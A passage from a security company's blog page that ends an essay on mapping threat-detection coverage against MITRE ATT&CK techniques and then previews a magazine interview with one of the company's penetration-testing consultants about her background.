By assembling these individual data points for several procedures, we can confidently approximate a coverage level for an individual technique. We can also identify commonalities and create categories of detection to cover as much or as many of the base conditions as our visibility allows.  

Once many techniques are aggregated in this way, you can begin to confidently understand your threat detection landscape with all the nuance observed at the tactical level. A great man (Robert M. Lee) once said “We derive much value by putting data into buckets,” and it is no different here. 

By looking at what data sources provide logging, detection, and prevention we can get a true sense of detective control efficacy. By looking at coverage over the different phases of the kill chain, we can start to prioritize choke points, detective efforts, emulation, deception, and research. By cataloging areas where prevention or detection are not carried forward to the alerting or response phases, we can better evaluate gaps, more accurately evaluate security products, and more efficiently spend budget or hours fixing those gaps with breach and attack simulation or similar tests. 

The data derived here is also useful in countless other ways. Purple and red teams can plan more effective tests or focus on known or suspected gaps. Threat intelligence teams can focus collection efforts on problematic TTPs. SOC analysts gain better situational awareness and have documentation to validate assumptions against. CISOs have confidence in their detection coverage and investments and can plan for product/resource changes more effectively.  

The pipeline that turns an activity on a system into an event that is responded to by the security team can be long and complicated. Knowledge of your coverage is your map of the battlefield and influences your decisions and directives and thus the activity that occurs at the strategic, operational, and tactical level. 

If you are relying on vendor coverage without further extension or customization, then you are susceptible to anyone who can defeat that vendor’s security product. By having a map, performing analysis, and designing behavior-based threat detections you are creating a delta that will ensure you’re not the slowest man running from the bear.  

Looking for a more in-depth analysis of MITRE ATT&CK Evaluations and how to improve your detective controls? Read my detailed analysis on the NetSPI technical blog.

Ready to get started? Collaborate with NetSPI’s Breach and Attack Simulation experts.

Authority Magazine: Wisdom From The Women Leading The Cybersecurity Industry, With Melissa Miller of NetSPI

On December 1, NetSPI Managing Security Consultant, Melissa Miller, was featured in the Authority Magazine article called Wisdom From The Women Leading The Cybersecurity Industry, With Melissa Miller of NetSPI. Read the preview below or view it online.

+++

The cybersecurity industry has become so essential and exciting. What is coming around the corner? What are the concerns we should keep an eye out for? How does one succeed in the cybersecurity industry? As a part of this interview series called “Wisdom From The Women Leading The Cybersecurity Industry”, we had the pleasure of interviewing Melissa Miller.

As a Managing Security Consultant at NetSPI, Melissa oversees the performance of web application penetration tests by NetSPI’s security practitioners, and serves as an instructor for NetSPI University — a training program for entry-level cybersecurity professionals new to penetration testing. Melissa is also a leader on NetSPI’s DE&I committee, which includes representing the company in various public-facing speaking events, panels, and partnerships. She has her BSc in Computer Science from the University of Minnesota as well as OSCP and CEH certifications.

Thank you so much for doing this with us! Before we dig in, our readers would like to get to know you a bit. Can you tell us a bit about your backstory and how you grew up?

I grew up in Excelsior, MN. My dad was an IT professional and a tech enthusiast, so I would sometimes spend summers with him, albeit grudgingly, running Windows updates on some of his clients’ machines, writing Python programs, and even building out a Python game together. That planted the seed of technology in my brain from a young age, but it wasn’t something that I ever wanted to do as a career because there was this stigma of IT professionals being “nerds” and “un-cool,” which I later found to be a shallow stereotype.

Is there a particular book, film, or podcast that made a significant impact on you? Can you share a story or explain why it resonated with you so much?

It is hard to think of a particular one because I mostly tend to listen to fiction (fantasy/sci-fi) audiobooks. I purposefully consume non-tech-related media as a way to maintain a balance between work and life.

You can read the full article on Medium!

Discover how NetSPI’s ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.
